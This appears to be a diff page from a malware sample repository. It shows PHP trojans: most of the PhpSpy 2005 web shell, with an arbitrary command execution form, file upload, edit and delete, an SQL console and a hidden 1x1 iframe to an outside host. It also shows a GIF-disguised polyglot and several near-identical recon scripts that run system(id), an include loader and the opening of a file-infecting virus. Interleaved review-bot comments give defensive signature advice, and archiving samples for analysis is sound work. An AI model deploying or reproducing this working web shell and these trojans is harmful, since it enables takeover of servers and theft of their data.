exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}//end check
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit;
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
if (dir_writeable($nowpath)) {
$dir_writeable = "可写";
} else {
$dir_writeable = "不可写";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2005</title>
<style type="text/css">
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "sans-serif";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
.redfont {
COLOR: "#A60000";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
<td width="10" align="center" nowrap><b>:</b></td>
<td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
</tr>
<tr>
<td colspan="3" align="center" nowrap><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回 PhpSpy 目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 2005</a></td>
</tr>
</table>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" name="uploadfile" class="INPUT" value="确定"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" name="createfile" class="INPUT" value="确定"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if(@$delfile!="") {
if(file_exists($delfile)) {
if (@unlink($delfile)) {
echo "".$delfile." 删除成功!";
} else {
echo "文件删除失败!";
}
} else {
echo "文件已不存在,删除失败!";
}
}
// 删除目录
elseif($rmdir) {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "目录已不存在!";
} else {
deltree($deldirs);
}
} else {
echo "删除失败!";
}
}
// 上传文件
elseif($uploadfile) {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif($doeditfile) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
}
// 连接MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL语句成功执行" : "出错: ".mysql_error();
mysql_close();
}
// 查看PHP配置参数状况
elseif($viewphpvar) {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "本程序由 <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> 小组 angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="30%"><b>文件</b></td>
<td align="center" nowrap width="17%"><b>创建日期</b></td>
<td align="center" nowrap width="17%"><b>最后修改</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="7%"><b>属性</b></td>
<td align="center" nowrap width="17%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$dirperm</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
}
}//while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$fileperm</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\">删除</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
?>
<tr class="<?=getrowbg()?>">
<td nowrap colspan="6" align="right"><?=$dir_i?> 个目录 / <?=$file_i?> 个文件</td>
</tr>
</table></td>
</tr>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$filename?>"> 输入新文件名则建立新文件</td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doeditfile" value="确定写入" class="input">
<input type="reset" value="重置" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">
选择执行函数:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select> 
输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr>
<tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input type="submit" name="rmdir" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : 'localhost';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">执行 SQL 语句</td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "phpenv") {
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST">
<tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr>
<tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="查看" class="input"></td>
</tr>
</form>
</table>
<?php
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="submit" name="login" value="OK">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "目录删除成功!" : "<font color=\"#ff0000\">目录删除失败!</font>";
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
?>


@ -0,0 +1,28 @@
<?php
/*
+--------------------------------------------------------------------------+
| str_replace(".", "", "P.h.p.S.p.y") Version:2006 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: Mar 21st 2005 |
| Thx All The Fantasy of Wickedness's members |
| Thx FireFox (http://www.molyx.com) |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check'] = "1";
// 如果需要密码验证,请修改登陆密码

1440
PHP/Trojan-Spy.PHP.PhPen.e Normal file

File diff suppressed because it is too large Load Diff

1990
PHP/Trojan-Spy.PHP.PhPen.f Normal file

File diff suppressed because it is too large Load Diff

58
PHP/Trojan.PHP.Agent.a Normal file

@ -0,0 +1,58 @@
GIF89aY?
?&#247;?????EUR???EUR?EUREUR???EUREUR?EUR?EUREUREUREUREUR&#192;&#192;&#192;??????????????????????????????????????????????????????????????????????????????????????????????????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???3??3?33?f3??3?&#204;3??33?33333f33?33&#204;33?3f?3f33ff3f?3f&#204;3f?3??3?33?f3??3?&#204;3??3&#204;?3&#204;33&#204;f3&#204;?3&#204;&#204;3&#204;?3??3?33?f3??3?&#204;3??f??f?3f?ff??f?&#204;f??f3?f33f3ff3?f3&#204;f3?ff?ff3fffff?ff&#204;ff?f??f?3f?ff??f?&#204;f??f&#204;?f&#204;3f&#204;ff&#204;?f&#204;&#204;f&#204;?f??f?3f?ff??f?&#204;f???????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;??&#204;3?&#204;33&#204;3f&#204;3?&#204;3&#204;&#204;3?&#204;f?&#204;f3&#204;ff&#204;f?&#204;f&#204;&#204;f?&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;??&#204;&#204;?&#204;&#204;3&#204;&#204;f&#204;&#204;?&#204;&#204;&#204;&#204;&#204;?&#204;??&#204;?3&#204;?f&#204;??&#204;?&#204;&#204;???????3??f?????&#204;????3??33?3f?3??3&#204;?3??f??f3?ff?f??f&#204;?f??????3??f?????&#204;????&#204;??&#204;3?&#204;f?&#204;??&#204;&#204;?&#204;??????3??f?????&#204;???,????Y?
????H° &#193;?*\&#200;°&#161;C??J|q&#162;C?3N¬h'!&#199;?; &#233;QdI"Gj4H2cK?U®$&#216;r&&#200;?,G&#210;&#204;?0dL?>w$)t'Q&#162;?&#226;?8Ti&#210;&#165;Py&#213;)&#211;&P--.?F?&#248;rhV©N&#195;j...tk&#216;&#178;W?&#162;&#165;?&#214;)&#199;?d&#199;&#194;5 &#244;&#165;O---5&#231;F...qm?§gc&#162;E?&#178;°&#225;&#195;?#?;
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "bsdcr3w<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "We was here ... and u no !!!<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
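Review bot: The `GIF89a` header ahead of the `<?php` tag at the top of this file makes it an image/PHP polyglot, and nothing in the commit records that; the forge itself previews the file as an image. I would add an analyst note beside the sample along the lines of `GIF/PHP polyglot: GIF89a header precedes <?php; prints host details from php_uname(), system(id), system(uptime)`. For defenders the practical consequence is that an upload check reading only the leading magic bytes accepts this file, so uploads should also be scanned for `<?php` and upload directories served with script execution disabled. The PHP body matches `PHP/Trojan.PHP.Agent.d` and `PHP/Trojan.PHP.PHPInfo.a`, `.c`, `.e` and `.g` in this commit apart from the banner string and a few extra fields, so a signature is better keyed on the shared `ConvertBytes` function and the `uname -a:` / `id:` output labels than on `bsdcr3w`.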


1890
PHP/Trojan.PHP.Agent.c Normal file

File diff suppressed because it is too large Load Diff

33
PHP/Trojan.PHP.Agent.d Normal file

@ -0,0 +1,33 @@
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Jikustik<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Jikustik was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

1
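--- a/PHP/Trojan.PHP.Io
+++ b/PHP/Trojan.PHP.Io
@@ -0,0 +1 @@
+<?php include("io.php"); ?>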
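Review bot: This one-line file only includes `io.php`, and no file of that name appears among the sections shown on this page, so the sample looks like a loader archived without its payload. A signature built from this line alone would match any legitimate script that includes a file called `io.php`. I would record the dependency next to the sample, for example `loader only; payload io.php not captured`, and tie detection to the payload once it is available.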

32
PHP/Trojan.PHP.PHPInfo.a Normal file

@ -0,0 +1,32 @@
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

55
PHP/Trojan.PHP.PHPInfo.c Normal file

@ -0,0 +1,55 @@
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "narasaon<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "narasaon was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

55
PHP/Trojan.PHP.PHPInfo.e Normal file

@ -0,0 +1,55 @@
<!--
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "netcat<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "netcat<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
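Review bot: The first line of this file is `<!--` where the sibling samples have `<?php`, so the visible content has no opening PHP tag and a PHP interpreter would pass it through as text rather than run it. Whether the sample was captured in that state or altered later (by a scanner or an HTML extraction step) cannot be told from the page. The index entry should state which, because a hash or signature taken from this copy will not match an executable variant of the same script.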

54
PHP/Trojan.PHP.PHPInfo.g Normal file

@ -0,0 +1,54 @@
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

79
PHP/Trojan.PHP.Sysbat Normal file

@ -0,0 +1,79 @@
<?php
// SYSBAT.PHP VIRUS
// By Xmorfic, www.shadowvx.com/bcvg, The Black Cat Virii Group
// SYSBAT.PHP - This virus infectes Config.sys, autoexec.bat and system files in
// C:\Windows\Command\ directory.
$config = 'C:\Config.sys';
$autoexec = 'C:\Autoexec.bat';
$phps = "SYSBAT.PHP";
$newphp = 'sysbat.sys';
$avxm = "This program performed an illegal operation";
$infsystem = true;
$infsys = fopen($config, "r");
$check = fread($infsys, filesize($config));
